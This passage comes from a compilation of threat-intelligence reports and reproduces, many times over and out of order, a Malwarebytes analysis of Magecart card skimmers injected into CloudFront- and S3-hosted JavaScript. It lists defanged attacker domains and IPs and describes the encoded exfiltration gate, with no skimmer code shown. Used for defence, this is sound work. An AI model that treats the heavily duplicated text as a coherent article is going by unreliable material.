criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 232 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 233 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 234 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 235 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 236 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 237 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 238 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 239 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 240 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 241 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 242 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 243 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 244 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 245 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 246 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 247 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 248 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 249 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 250 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 251 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 252 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 253 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 254 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 255 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 256 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 257 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 258 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 259 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 260 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 261 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 262 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 263 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 264 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s 